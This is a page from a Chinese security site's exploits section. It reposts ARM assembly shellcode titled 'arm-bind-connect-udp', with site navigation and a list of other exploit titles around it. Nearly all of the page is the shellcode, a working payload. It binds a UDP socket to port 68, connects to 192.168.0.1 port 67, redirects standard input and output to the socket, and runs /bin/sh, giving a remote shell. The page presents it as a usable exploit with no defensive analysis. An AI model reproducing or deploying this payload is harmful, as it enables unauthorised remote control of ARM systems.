ARM Bind Connect UDP Port 68

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

ARM Bind Connect UDP Port 68

来源：gmail account dgodas 作者：Daniel 发布时间：2010-10-26

/*
* Title: arm-bind-connect-udp
* Brief: Bind to port 68 on any local address and plug a udp shell
* onto to port 67 on 192.168.0.1
* Author: Daniel Godas-Lopez <gmail account dgodas>
*/

.if 1
/*
close(3), close(4), ..., close(1024)
*/

mov %r1, $1024
1: mov %r0, %r1
svc 0x00900006
subs %r1, %r1, $1
subs %r2, %r1, $3
bpl 1b
.endif

/*
soc_des = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
*/

mov %r0, $2  /* AF_INET */
mov %r1, $2  /* SOCK_DGRAM */
mov %r2, $17  /* IPPRTOTO_UDP */
push {%r0, %r1, %r2}
mov %r0, $1  /* socket */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $12

mov %r6, %r0 /* r6 = soc_des */

/*
bind(soc_des, (struct sockaddr*) &serv_addr, sizeof(serv_addr));
*/

.if 0 /* r0 == r6 already */
mov %r0, %r6 /* soc_des */
.endif

mov %r1, $0x44000000
add %r1, $2  /* port = 68, family = 2 (AF_INET) */
sub %r2, %r2, %r2 /* addr = 0.0.0.0 */
push {%r1, %r2}
mov %r1, %sp  /* pointer to sockaddr_in */
mov %r2, $16  /* sizeof(struct sockaddr_in) */

push {%r0, %r1, %r2}
mov %r0, $2  /* bind */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $20

/*
connect(soc_des, (struct sockaddr*) &cli_addr, sizeof(cli_addr));
*/

mov %r0, %r6 /* soc_des */

mov %r1, $0x43000000
add %r1, $2  /* port = 67, family = 2 (AF_INET) */
mov %r2, $0x1000000
add %r2, %r2, $0xa800
add %r2, $0xc0  /* addr = 192.168.0.1 */
push {%r1, %r2}
mov %r1, %sp  /* pointer to sockaddr_in */
mov %r2, $16  /* sizeof(struct sockaddr_in) */

push {%r0, %r1, %r2}
mov %r0, $3 /* connect */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $20

/*
   dup2(soc_cli,0);
   dup2(soc_cli,1);
   dup2(soc_cli,2);
*/

mov %r1, $2
1: mov %r0, %r6
svc 0x0090003f
subs %r1, %r1, $1
bpl 1b

/*
execve("/bin/sh", parms, env);
*/

sub %r1, %sp, $4 /* argv[0] = "sh" */
sub %r2, %r2, %r2 /* argv[1] = 0x00000000 */
mov %r3, $0x2f
mov %r7, $0x62
add %r3, %r7, lsl $8
mov %r7, $0x69
add %r3, %r7, lsl $16
mov %r7, $0x6e
add %r3, %r7, lsl $24 /* '/' 'b' 'i' 'n' */
mov %r4, $'/'
mov %r7, $'s'
add %r4, %r7, lsl $8
mov %r7, $'h'
add %r4, %r7, lsl $16 /* '/' 's' 'h' 0x00 */
mov %r5, $'s'
mov %r7, $'h'
add %r5, %r7, lsl $8 /* 's' 'h' 0x00 0x00 */

push {%r1, %r2, %r3, %r4, %r5}

add %r0, %sp, $8 /* filename ptr */
add %r1, %sp, $0 /* argv ptr */
add %r2, %sp, $4 /* env ptr */

svc 0x0090000b

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告